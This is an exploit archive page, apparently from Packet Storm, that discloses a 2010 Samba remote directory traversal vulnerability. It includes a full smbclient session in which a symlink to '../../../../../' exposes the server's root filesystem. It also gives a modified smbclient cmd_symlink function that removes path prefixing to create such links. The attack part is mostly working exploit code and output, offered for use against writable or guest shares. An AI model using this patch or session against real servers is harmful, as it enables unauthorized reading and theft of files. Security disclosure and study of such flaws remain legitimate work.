exploit the possibilities

Samba Remote Directory Traversal

Samba Remote Directory Traversal
Posted Feb 5, 2010
Authored by Kingcope

Samba suffers from a remote directory traversal vulnerability. A remote attacker can read, list and retrieve nearly all files on the system remotely. Required is a valid samba account for a share which is writable OR a writable share which is configured to be a guest account share, in this case this is a preauth exploit.Included is a smbclient patch that exploits this vulnerability.

tags | exploit, remote, file inclusion
MD5 | 1a2d221d161a154517117c74712f77de

Samba Remote Directory Traversal

Change Mirror Download
Samba Remote Directory Traversal
logic fuckup discovered & exploited by Kingcope in 2010

It seems there was a quite similar bug found back in 2004:
http://marc.info/?l=bugtraq&m=109658688505723&w=2

A remote attacker can read, list and retrieve nearly all files on the System remotely.
Required is a valid samba account for a share which is writeable OR
a writeable share which is configured to be a guest account share,
in this case this is a preauth exploit.

The attacker can write for example into /tmp or where the account
he is connecting with has access to (/home/<user> etc).

Exploit session (using the patched smbclient exploit):

smb is a samba user created.

root@nr-pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb //<host>/testmount/
Enter smb's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: \> ls
. D 0 Wed Feb 3 14:27:03 2010
.. D 0 Wed Feb 3 14:19:13 2010
test D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010

45503 blocks of size 2097152. 24437 blocks available
smb: \> symlink ../../../../../ foobar
smb: \> ls
. D 0 Wed Feb 3 14:27:47 2010
.. D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010
foobar D 0 Mon Feb 1 20:29:12 2010

45503 blocks of size 2097152. 24437 blocks available
smb: \> ls ..
NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing \..

45503 blocks of size 2097152. 24437 blocks available
smb: \> cd foobar
smb: \foobar\> ls
. D 0 Mon Feb 1 20:29:12 2010
.. D 0 Mon Feb 1 20:29:12 2010
initrd.img.old 7646184 Mon Jan 18 13:15:48 2010
boot.ini 18832 Mon Feb 1 20:29:12 2010
home D 0 Mon Jan 18 13:08:24 2010
initrd.img 8007195 Thu Jan 21 21:51:26 2010
.cache DH 0 Sat Jan 23 14:19:08 2010
opt D 0 Sat Jan 30 11:39:59 2010
lib D 0 Thu Jan 21 21:13:01 2010
usr D 0 Sun Jan 31 22:08:11 2010
.libs DH 0 Thu Jan 21 12:30:48 2010
var D 0 Sun Jan 31 21:14:42 2010
bin D 0 Mon Jan 18 13:31:14 2010
selinux D 0 Tue Oct 20 01:05:22 2009
root D 0 Tue Feb 2 19:43:59 2010
vmlinuz.old 3890400 Fri Oct 16 20:03:49 2009
vmlinuz 3890560 Thu Dec 10 20:33:26 2009
etc D 0 Wed Feb 3 14:17:29 2010
srv D 0 Sat Jan 23 20:17:29 2010
proc DR 0 Wed Feb 3 14:10:41 2010
dev D 0 Wed Feb 3 14:11:02 2010
boot D 0 Thu Jan 21 21:51:26 2010
mnt D 0 Sat Jan 23 19:26:23 2010
media D 0 Fri Jan 29 08:32:31 2010
cdrom D 0 Mon Jan 18 12:40:11 2010
tmp D 0 Wed Feb 3 14:26:20 2010
sbin D 0 Thu Jan 21 21:50:58 2010
lost+found D 0 Mon Jan 18 12:39:57 2010
sys D 0 Wed Feb 3 14:10:41 2010

45503 blocks of size 2097152. 24437 blocks available
smb: \foobar\>

put and get works in the folder now!

list open shares, this is normal operation mode not an exploit:

root@nr-pentest:~/Downloads/samba-3.4.5/source3/client# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L //<host>/
Enter root's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

Sharename Type Comment
--------- ---- -------
testmount Disk // < this share is writable and exploitable!!
print$ Disk Printer Drivers
IPC$ IPC IPC Service (nr-pentest server (Samba, Ubuntu))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

Server Comment
--------- -------
NR-PENTEST nr-pentest server (Samba, Ubuntu)

Workgroup Master
--------- -------
WORKGROUP NR-PENTEST


smbclient patch (exploit):

samba-3.4.5/source3/client/client.c
/****************************************************************************
UNIX symlink.
****************************************************************************/

static int cmd_symlink(void)
{
TALLOC_CTX *ctx = talloc_tos();
char *oldname = NULL;
char *newname = NULL;
char *buf = NULL;
char *buf2 = NULL;
char *targetname = NULL;
struct cli_state *targetcli;

if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
!next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
d_printf("symlink <oldname> <newname>\n");
return 1;
}
oldname = talloc_asprintf(ctx,
"%s", // << HERE modified
buf);
if (!oldname) {
return 1;
}
newname = talloc_asprintf(ctx,
"%s", // << HERE modified
buf2);
if (!newname) {
return 1;
}
/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
oldname = talloc_asprintf(ctx,
"%s%s", // < modified (see above)
client_get_cur_dir(), // < removed (see above)
buf);
if (!oldname) {
return 1;
}
newname = talloc_asprintf(ctx,
"%s%s", // < modified (see above)
client_get_cur_dir(), // < removed (see above)
buf2);
if (!newname) {
return 1;
}
----------------------------------------------*/

if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
d_printf("link %s: %s\n", oldname, cli_errstr(cli));
return 1;

}

if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
d_printf("Server doesn't support UNIX CIFS calls.\n");
return 1;
}

if (!cli_unix_symlink(targetcli, targetname, newname)) {
d_printf("%s symlinking files (%s -> %s)\n",
cli_errstr(targetcli), newname, targetname);
return 1;
}

return 0;
}


// Cheers,
// kcope

Login or Register to add favorites

File Archive:

February 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    33 Files
  • 2
    Feb 2nd
    30 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    8 Files
  • 5
    Feb 5th
    11 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    1 Files
  • 8
    Feb 8th
    37 Files
  • 9
    Feb 9th
    15 Files
  • 10
    Feb 10th
    11 Files
  • 11
    Feb 11th
    26 Files
  • 12
    Feb 12th
    8 Files
  • 13
    Feb 13th
    1 Files
  • 14
    Feb 14th
    1 Files
  • 15
    Feb 15th
    9 Files
  • 16
    Feb 16th
    33 Files
  • 17
    Feb 17th
    6 Files
  • 18
    Feb 18th
    10 Files
  • 19
    Feb 19th
    20 Files
  • 20
    Feb 20th
    1 Files
  • 21
    Feb 21st
    1 Files
  • 22
    Feb 22nd
    17 Files
  • 23
    Feb 23rd
    15 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close